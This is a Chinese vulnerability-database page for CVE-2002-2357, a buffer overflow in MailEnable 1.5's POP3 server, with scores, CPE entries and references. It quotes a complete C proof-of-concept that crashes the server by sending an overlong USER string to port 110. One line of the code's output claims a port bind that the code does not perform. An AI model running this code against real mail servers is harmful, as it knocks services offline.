CVE-2002-2357
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:33:00
NMCOE    

[原文]MailEnable 1.5 015 through 1.5 018 allows remote attackers to cause a denial of service (crash) via a long USER string, possibly due to a buffer overflow.


[CNNVD]MailEnable Email Server远程缓冲区溢出漏洞(CNNVD-200212-207)

        
        MailEnable是一款基于WEB的邮件服务程序。
        MailEnable POP3服务器对用户登录字段数据缺少正确检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以POP3进程权限在系统上执行任意指令。
        攻击者可以连接有此漏洞的MailEnable POP3服务程序,并在USER提示字段输入超长的字符串,可触发缓冲区溢出,精心构建提交数据可能以POP3进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:mailenable:mailenable:1.5016
cpe:/a:mailenable:mailenable:1.5017
cpe:/a:mailenable:mailenable:1.5018
cpe:/a:mailenable:mailenable:1.5015

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2357
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2357
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-207
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/6197
(PATCH)  BID  6197
http://www.iss.net/security_center/static/10652.php
(UNKNOWN)  XF  mailenable-pop3-server-dos(10652)
http://archives.neohapsis.com/archives/bugtraq/2002-11/0236.html
(UNKNOWN)  BUGTRAQ  20021117 MailEnable POP3 Server remote shutdown !:/ -newest ~ (and previous) bufferoverflow-

- 漏洞信息

MailEnable Email Server远程缓冲区溢出漏洞
中危 边界条件错误
2002-12-31 00:00:00 2002-12-31 00:00:00
远程  
        
        MailEnable是一款基于WEB的邮件服务程序。
        MailEnable POP3服务器对用户登录字段数据缺少正确检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以POP3进程权限在系统上执行任意指令。
        攻击者可以连接有此漏洞的MailEnable POP3服务程序,并在USER提示字段输入超长的字符串,可触发缓冲区溢出,精心构建提交数据可能以POP3进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        MailEnable
        ----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.mailenable.com/

- 漏洞信息 (22023)

MailEnable 1.501x Email Server Buffer Overflow Vulnerability (EDBID:22023)
windows remote
2002-11-18 Verified
0 redsand
N/A [点击下载]
source: http://www.securityfocus.com/bid/6197/info

A buffer overflow vulnerability has been reported for MailEnable's POP3 server. The vulnerability is due to insufficent bounds checking of the USER login field.

An attacker can exploit this vulnerability by connecting to a vulnerable MailEnable server and sending an overly long string as the value for the USER login prompt. This will trigger the buffer overflow condition. 

/*
*
* Written by redsand
* <redsand@redsand.net>
* Vuln. date found: November 18. 2002
* Vulnerable: Windows 9x/NT/XP MailEnable POP Server Version 1.02
*
* Usage: ./mailenable-dos.1.3 <host> [port] [port] is optional. default is in the #define (port 110)
* Need to Enable [offset] in final release.
*
* Proof of Concept code (PoC)
*
*/


#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 110

char string[2010];
char death[2500];
char top[5], end[50];
char tag[] = "::redsand.net::";

int main(int argc, char *argv[]) {

  int sockfd, port, i;
  char buf[2500];
  struct hostent *ha;
  struct sockaddr_in sa;
  if (argc < 2 ) {
printf("MailEnable POP Server Version 1.02 DoS\n:: redsand <at> redsand.net\r\nUsage: %s <host> <port>\n", argv[0]);
    exit(0);
  }
if (argv[2]) {
port = atoi(argv[2]);
} else { port = PORT; }
for( i = 0; i <2009; i++) {
string[i] = 'A';
}

strcpy(top,"USER ");
strcpy(end,tag);
strcpy(death,top);
strcat(death,string);
strcat(death,end);

  if (!(ha = gethostbyname (argv[1])))
    perror ("gethostbyname");

  bzero (&sa, sizeof (sa));
  bcopy (ha->h_addr, (char *) &sa.sin_addr, ha->h_length);
  sa.sin_family = ha->h_addrtype;
  sa.sin_port = htons (port);

  if ((sockfd = socket (ha->h_addrtype, SOCK_STREAM, 0)) < 0) {
    perror ("socket");
    exit (1);
  }
 printf("MailEnable :: redsand <at> redsand.net\r\n+ connecting...\n");
  if (connect (sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    perror ("connect");
    exit (1);
  }
  printf("+ connected\n+ sending request to pop3 server\n");
  send(sockfd, death, sizeof(death), 0);
  // read(sockfd, buf, 2050, 0);
    close(sockfd);
  printf("+ finished\n");
  printf("\r\rIf exploit worked, then it should bind port on 3879\n");
}

/* redsand.net */
		

- 漏洞信息

41362
MailEnable USER String Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2002-11-17 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站